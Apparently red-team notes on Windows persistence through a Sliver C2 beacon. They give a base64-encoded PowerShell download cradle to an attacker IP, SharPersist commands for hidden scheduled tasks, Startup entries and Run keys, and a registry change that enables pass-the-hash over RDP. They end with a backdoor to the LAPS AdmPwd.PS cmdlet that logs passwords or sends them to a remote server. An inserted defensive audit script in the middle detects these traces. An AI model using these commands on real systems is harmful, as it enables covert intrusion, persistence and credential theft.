Persistence
Persistence on Windows
The commands that include `execute-assembly` have been executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes.
- Task scheduler

```powershell
$str = 'IEX ((new-object net.webclient).downloadstring("http://10.10.10.10/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
```

```
execute-assembly -i -E SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64_STRING" -n "Updater" -m add -o hourly
```
- Startup folder

```
execute-assembly -i -E SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64_STRING" -f "UserEnvSetup" -m add
```
- Registry AutoRun

```
execute-assembly -i -E SharPersist.exe -t reg -c "C:\ProgramData\beacon.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
```
- Background PowerShell task

```powershell
Start-Process -FilePath ".\file.exe" -ArgumentList "10.10.10.10 9001" -NoNewWindow
```
- Disable PTH restrictions on RDP (DisableRestrictedAdmin = 0 enables Restricted Admin mode)

```
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```
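Added here as a defender's counterpart, not part of the original notes: a PowerShell audit that enumerates the locations the commands above write to (scheduled task actions, Run keys, Startup folders), decodes any `-enc` payload it finds, and reports whether Restricted Admin mode has been switched on. It assumes only the standard Windows paths and key names; nothing is taken from the notes' values.

```powershell
# Added example, not from the original notes: audit the persistence locations the commands above
# target (scheduled tasks, Run keys, Startup folder) plus the RestrictedAdmin setting, and decode
# any "-enc" PowerShell payload so the launched command is visible. Run elevated; all paths/keys are
# the standard Windows ones, not values from the notes.
function Decode-EncodedCommand {
    param([string]$CommandLine)
    # -enc/-ec/-EncodedCommand carries Base64 of a UTF-16LE (Unicode) string
    if ($CommandLine -match '(?i)-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
        catch { return '<undecodable base64>' }
    }
    return $null
}
$suspicious = '(?i)(-enc|-ec|-EncodedCommand|-w hidden|-nop|downloadstring|IEX)'
$findings = @()
# 1. Scheduled task actions that launch hidden/encoded PowerShell
foreach ($task in Get-ScheduledTask) {
    foreach ($a in $task.Actions) {
        $cmd = "$($a.Execute) $($a.Arguments)"
        if ($cmd -match $suspicious) {
            $findings += [pscustomobject]@{ Source='SchTask'; Name=$task.TaskName; Command=$cmd; Decoded=(Decode-EncodedCommand $cmd) }
        }
    }
}
# 2. Run keys (SharPersist -k hkcurun writes the HKCU one); every value is listed for review
foreach ($key in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run','HKLM:\Software\Microsoft\Windows\CurrentVersion\Run') {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if ($props) {
        foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notmatch '^PS' })) {
            $findings += [pscustomobject]@{ Source=$key; Name=$p.Name; Command=$p.Value; Decoded=(Decode-EncodedCommand "$($p.Value)") }
        }
    }
}
# 3. Startup folders (per-user and all-users); .lnk entries are resolved to target + arguments
$shell = New-Object -ComObject WScript.Shell
foreach ($dir in "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup", "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp") {
    foreach ($f in Get-ChildItem -Path $dir -File -ErrorAction SilentlyContinue) {
        $cmd = if ($f.Extension -eq '.lnk') { $s = $shell.CreateShortcut($f.FullName); "$($s.TargetPath) $($s.Arguments)" } else { $f.FullName }
        $findings += [pscustomobject]@{ Source='Startup'; Name=$f.Name; Command=$cmd; Decoded=(Decode-EncodedCommand $cmd) }
    }
}
# 4. DisableRestrictedAdmin = 0 turns Restricted Admin mode on, which is what the reg add above sets
$lsa = Get-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name DisableRestrictedAdmin -ErrorAction SilentlyContinue
if ($lsa -and $lsa.DisableRestrictedAdmin -eq 0) { Write-Warning 'Restricted Admin mode is enabled (DisableRestrictedAdmin = 0)' }
$findings | Format-Table -AutoSize -Wrap
```

Run keys are listed in full rather than filtered, since a benign-looking binary path (like the AutoRun entry above) carries none of the PowerShell markers; review them against a known-good baseline.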
- LAPS Backdoor with AdmPwd.PS

```csharp
// Main/AdmPwd.PS/Main.cs
PasswordInfo pi = DirectoryUtils.GetPasswordInfo(dn);
// log every password the cmdlet retrieves to a local file before returning it
var line = $"{pi.ComputerName} : {pi.Password}";
System.IO.File.AppendAllText(@"C:\Temp\LAPS.txt", line);
WriteObject(pi);
```

```csharp
// or make it call back to a server
using System.Net;
...
using (var client = new WebClient())
{
    client.BaseAddress = "http://10.10.10.10";
    try
    {
        // query string is relative to BaseAddress; pi is the PasswordInfo retrieved above
        client.DownloadString($"?computer={pi.ComputerName}&pass={pi.Password}");
    }
    catch
    {
        // swallow errors so the cmdlet keeps behaving normally
    }
}
```